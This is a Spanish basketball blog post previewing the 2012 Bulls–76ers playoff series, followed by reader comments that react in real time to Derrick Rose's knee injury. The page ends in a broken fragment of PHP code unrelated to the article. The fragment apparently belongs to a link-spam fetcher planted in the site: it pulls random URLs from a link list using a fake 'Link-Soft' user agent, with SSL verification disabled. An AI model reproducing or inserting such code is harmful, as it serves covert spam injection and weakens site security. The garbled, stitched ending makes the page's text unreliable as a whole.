Análisis: Chicago Bulls (1) vs Philadelphia 76ers (8)

28 de April de 2012 por TheDeerHunter

Regular: 2-1

Bulls: 96.3 PF (18º) – 88.2 PC (1º)
Sixers: 93.6 PF (22º) – 89.4 PC (3º)

A mitad de temporada nos vimos obligados revisar al alza nuestras previsiones con respecto a Philadelphia. En ese momento casi les exigíamos una segunda ronda de playoffs. A partir de más o menos aquellas fechas se produjo la hecatombe. Un parcial de 3-8 en febrero, otras 8 derrotas en marzo y una racha inicial de 2-7 en abril que hizo peligrar seriamente la postemporada. 4 victorias salvaban la situación (3 de ellas contra equipos eliminados y otra contra unos Pacers que no se jugaban nada) pero no evitan ahora la imagen de “cuesta abajo” con la que afrontan las eliminatorias.

En Chicago, al contrario, no se aprecia ni la más mínima fisura. Han tenido a su MVP Rose en el dique seco 25 partidos y apenas han perdido dos encuentros seguidos una vez en todo el curso. Parecen una versión mejorada de los Sixers y de su defensa hasta se hacen spots televisivos.

Ahora mismo parece complicado que los Sixers estén en condiciones de ganarle algún partido a los Bulls. Mucho tendría que mejorar su ofensiva con respecto a lo visto últimamente. Nos tememos que ni los playoffs son el mejor escenario para ello ni los sistemas de Thibodeau faciliten mucho las cosas en ese sentido.

Claves de la eliminatoria

– Segundas unidades: El banquillo de los Sixers (con Louis Williams, Thaddeus Young, Evan Turner…) suele marcar diferencias, pero ahora lo va a tener más difícil contra el muro de las lamentaciones que es la rocosa segunda unidad de los Bulls. Neutralizado este aspecto, los Sixers estarían acabados.

– Nivel de Derrick Rose: Preocupa el estado del base estelar de los Bulls con tanto problema físico sufrido. Por otro lado la pareja Hawes-Brand no es la mejor capacitada para frenar sus potentes penetraciones.

– Duelo de aleros: Puede saltar chispas en el Iguodala vs Deng. No ha sido el mejor año del anglo-sudanés pero Iguodala no lo va a tener ni mucho menos fácil contra él.

Pronóstico

4-0 Bulls

Calendario (hora española)

Partido 1 – Sábado 28 abril en Chicago (19h00)
Partido 2 – Miércoles 2 mayo en Chicago (02h00)
Partido 3 – Sábado 5 mayo en Philadelphia (02h00)
Partido 4 – Domingo 6 mayo en Philadelphia (19h00)
Partido 5* – Miércoles 9 mayo en Chicago
Partido 6* – Viernes 11 mayo en Philadelphia
Partido 7* – Domingo 13 mayo en Chicago

Comenta

33 comentarios a esta entrada

  1. Nacho dice:
    #1

    Yo solo digo una cosa, Ojito con los Sixers. Se les da por muertos antes del entierro, e igual no estaban muertos, que estaban de parranda. Casi seguro que pierden la eliminatoria, pero no creo que sea un barrido.

    Por otro lado ya se que los Bulls sin su estrella la mitad de los partidos, han ganado la regular. Y aun no se cómo, porque viéndoles jugar me han decepcionado bastante. Creo que más que ganar partidos, los han perdido los rivales. Que eso se debe a una buenísima defensa, lo tengo claro, pero a los buenos es difícil pararlos tantos partidos. Y esa es su ventaja contra los de Filadelfia, que no tienen ningún finalizador (a no ser que Iguodala destape el tarro). Pero si pasan los Celtics no los veo en las finales, y con los Hawks tampoco lo vería claro.

    4-2, y ojo que no levanten uno de los dos primeros partidos los visitantes. Dependerá si siguen con su tónica desde hace mes y medio, o que como dice Daimiel, lleven 20 días preparando la serie contra Chicago.

      Citar

  2. Sancho88 dice:
    #2

    Te han decepcionado los Bulls? Pues chico, ya me dirás quién te ha dado buenas sensaciones entonces… a mi juicio, han hecho la temporada regular más brillante que yo recuerdo en bastantes años, quizá desde los Celtics hace 4-5 años . Impecable

      Citar

  3. Sancho88 dice:
    #3

    Y no lo digo solo por el parcial, sino por todo. Concepto de juego colectivo insuperable, defensa férrea inexpugnable, juego interior activo y en el que todos han colaborado, KYLE KORVER ESPECTACULAR EN EL JUEOG EXTERIOR DESDE EL BANQUILLO… etc etc, con todos los suplentes que sabemos, como Watson, Brewer, Lucas… que nadie daba un duro por ellos y han ganado partidos con tiros suyos, no los han perdido los rivales. Les han pintado la cara en muchas ocasiones a equipos teóricamente superiores. No todo en baloncesto es nombre. Ahora bien, hay algo de lo que has dicho que sí coincido Nacho. A 7 partidos contra Heat… a mí tampoco me convencen. Veremos

      Citar

  4. Sancho88 dice:
    #4

    Por cierto, yo también veo un rosquito aquí… 4-0

      Citar

  5. MagicJohnson32 dice:
    #5

    Es que cuesta imaginar cómo podría superar un ataque tan pobre como el de los Sixers a una defensa tan buena como la de los Bulls. Demasiadas cosas deberían funcionarle a Philly para plantar cara. Solo una lesión de Rose equilibraría las cosas.

      Citar

  6. Heineken dice:
    #6

    4-1 para los Bulls

      Citar

  7. simon dice:
    #7

    MagicJohnson32:
    Es que cuesta imaginar cómo podría superar un ataque tan pobre como el de los Sixers a una defensa tan buena como la de los Bulls. Demasiadas cosas deberían funcionarle a Philly para plantar cara. Solo una lesión de Rose equilibraría las cosas.

    y yo creo que ni eso…

      Citar

  8. German dice:
    #8

    Creo que los Bulls pueden darse el lujo de cuidar a Rose en esta serie, por ejemplo si estan 2-0 arriba prescindir de el algun partido o darle menos minutos en general. Philadelphia viene en franco descenso y no creo que suponga un escollo duro a este verdadero equipo que es Chicago.

    4-1 Bulls.

      Citar

  9. diestro dice:
    #9

    Yo si creo que Philadelphia puede dar alguna sorpresa, aunque no para ganar la serie. mi pronostico 4-2

      Citar

  10. rumbero dice:
    #10

    MagicJohnson32: Es que cuesta imaginar cómo podría superar un ataque tan pobre como el de los Sixers a una defensa tan buena como la de los Bulls. Demasiadas cosas deberían funcionarle a Philly para plantar cara. Solo una lesión de Rose equilibraría las cosas.

    Lo veo muy parecido. Además el punto fuerte de Philly que podría ser su segunda unidad queda bien igualada por la de los Bulls. Con lo solventes que se han mostrado toda la temporada, incluso sin Rose seguirian siendo favoritos.
    4-1Chicago

      Citar

  11. melo15 dice:
    #11

    Yo si fuera el GM de los Sixers, venderia a Iguolada por rondas del Draft y a Doug Collins por no darle confianza a Turner, el problema esque Iguolada se cree una estrella y no lo es, como segunda espada seria un fran complemento, pero liderados por el los Sixers no van a llegar a ningun lado.

      Citar

  12. Nacho dice:
    #12

    Sancho88:
    Te han decepcionado los Bulls? Pues chico, ya me dirás quién te ha dado buenas sensaciones entonces… a mi juicio, han hecho la temporada regular más brillante que yo recuerdo en bastantes años, quizá desde los Celtics hace 4-5 años . Impecable

    Son sensaciones. Y algunas veces aciertan, y otras no.
    Pongo un ejemplo con el fútbol: El Madrid va a ganar la liga, porque es infinítamente mejor que el resto de los equipos que juegan en España (y Europa). Porque es demoledor. Pero cuando llegan partidos de verdad, con los buenos, y con los que se juega algo, pierde. (vale le ha ganado uno al Barça) Pronostiqué con tiempo que se la darían contra los alemanes, por esa razón. Ganan el resto de los partidos por superioridad (en el caso de los Bulls por su impresionante defensa) pero muchos partidos da la impresión de que el rival puede hacer algo más.
    Con los Bulls me pasa algo parecido. Con la cosa de que los he visto ganar sin ser superiores (y esto parece que va en contra de mi razonamiento, y es verdad, y les da más mérito a los toros) Y creo que en PO las defensas son importantes, y en este sentido la suya no puede crecer mucho (ya está muy arriba) la de los demás sí, y tipos como Pierce (por ejemplo) lo puedes parar un partido, pero no cuatro. No sé, creo que tendrán con Philadelfia más problemas de lo esperado, y que caen con los Celtics (si estos ganan a Atlanta, claro)

      Citar

  13. Esteban dice:
    #13

    la serie estaz definida antes de comenzar, por lo tanto es un escenario propicio paraz que los bulls se relajen medianamente y se dejen perder algun juego, RECUERDAN BULLS-PACERS en los PO pasados? los pacers se llevaron un juego aunque sus chances reales de ganar la serie siempre fueron nulas

    no creo que haya barrida, un partido para 76s

      Citar

  14. Sancho88 dice:
    #14

    En tres minutos empieza la temporada. A gozarla!!!

      Citar

  15. rumbero dice:
    #15

    +9 para Chicago. A Rose aun se le espera, pero parece que RIP ha cogido el tono en el mejor momento de la temporada

      Citar

  16. melo15 dice:
    #16

    Ir tetransmitiendolo por aqui.jejejeje

      Citar

  17. MagicJohnson32 dice:
    #17

    El partido sigue el guion previsto. Los Sixers tienen muchos problemas para anotar consistentemente ante un equipo que pelea cada posesión, cada tiro. A los Bulls les basta con cierto orden, buenos bloqueos para tiros de media distancia (y así vemos al Rip Hamilton de toda la vida) y con un claro dominio del rebote para abrir brecha y apuntarse el 1-0 con comodidad. Collins ha intentado armar una 2ª unidad capaz de marcar diferencias: Turner, Lou Williams, Evan Turner y Hawes. Pero no ha funcionado. El mejor sixer, de largo, está siendo Brand.

      Citar

  18. melo15 dice:
    #18

    Asi que Brand ha ganado el duelo entre fosiles (Boozer-Brand)

      Citar

  19. TheDeerHunter dice:
    #19

    Hombre melo, con 30 Boozer no se le puede considerar fósil… o la mitad de jugadores de la liga lo son.

      Citar

  20. MagicJohnson32 dice:
    #20

    Con el partido ganado, a 1 minuto del final, mantienes a Derrick Rose en pista. ¿Qué puede pasar? Que se lesione la rodilla.

    Pues acaba de pasar. Tiene muuuuy mala pinta.

      Citar

  21. German dice:
    #21

    Quiero creer que no fue para que complete un triple-doble, pero otra explicacion no le encuentro…

      Citar

  22. Jose Luis dice:
    #22

    Rotura de ligamentos he leído en un foro… No confirmado aún

      Citar

  23. MagicJohnson32 dice:
    #23

    Es imposible de saber todavía, pero si tuviese que jugarme dinero, apostaría a que Rose no vuelve a jugar esta temporada. ¿¿¿¿En qué leches estaba pensando Thibodeau????

      Citar

  24. rumbero dice:
    #24

    Mala pinta tiene. Yo creo que tampoco va a jugar más. Adiós a cualquier opción de anillo en ese caso. Contra Sixers les puede valer pero no más. Final de conferencia paea Celtics? Es adelantarse demasiado

      Citar

  25. Jose Luis dice:
    #25

    Confirmado lo de Rose. Ligamento cruzado anterior y medio, roto. Ni play-offs, ni JJOO

      Citar

  26. MagicJohnson32 dice:
    #26

    Es imposible que sepan ya qué lesión es. Por supuesto que tiene pinta de ser serio, y probablemente sea el ligamento, pero todavía no lo pueden saber.

      Citar

  27. melo15 dice:
    #27

    Bueno los Bulls van a notar su falta, pero el USA Team no, westbrook puede hacer la funcion que ejerceria Rose

      Citar

  28. MagicJohnson32 dice:
    #28

    Y CP3 y Deron… no será por bases.

      Citar

  29. Lucho dice:
    #29

    Pronostique 4-0 Bulls (fue antes que empiece el partido y, obviamente, antes de la lesion de Rose)
    Q mala suerte lo de Derrick..

      Citar

  30. Sancho88 dice:
    #30

    Bueno, esto les limita sus posibilidades de anillo. Esto huele a paseo en el Este de los Heat, esperemos que Spurs los puedan parar en la final. Lo que comentáis de los árbitros desgraciadamente siempre es así con LB… Es lo que hay. Knicks seguramente hayan pagado ser un poco los pardillos de la eliminatoria. Muchos años sin estar ahí, y en PO se ponen todos las pilas, incluso los árbitros para equilibrar balanzas… muy triste. No he visto los partidos porque me he quedado sobao, porque estoy medio febril y me duele todo, pero malísima noticia de Rose. Lo de los cruzados lo va a pagar ya para toda su carrera seguramente. También putada lo de Shumpert… ale, para que se le vuelva a ocurrir al señor Stern organizar una temporada de 66 partidos cuando debería haber sido de 50 como mucho… ahora se están viendo las consecuencias. Qué estrella no se ha lesionado aún? Creo que solo Pau, el otro día saqué la lista, pero vamos, solo uno o dos tipos por equipo, está la cosa fatal

      Citar

  31. Denise dice:
    #31

    Pues adios al anillo para los Bulls y ojo con que ahora los Sixers y su completo juego en equipo no voltee la eliminatoria y elimine a los Bulls.

    Pensando en el año que viene, creo que deberian de desprenderse del mierda de Boozer y Noah e ir de cabeza a por Howard y/o Gasol. Un tridente Rose-Pau-Howard seria la caña.

      Citar

  32. melo15 dice:
    #32

    O intentar fichar a Josh Smith, se complementaria bastante bien con Noah, y tiene mas futuro que Gasol

      Citar

  33. Sancho88 dice:
    #33

    melo15:
    O intentar fichar a Josh Smith, se complementaria bastante bien con Noah, y tiene mas futuro que Gasol

    Nunca pierdes comba cuando se trata de pegarle duro a Pau. Zaska!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>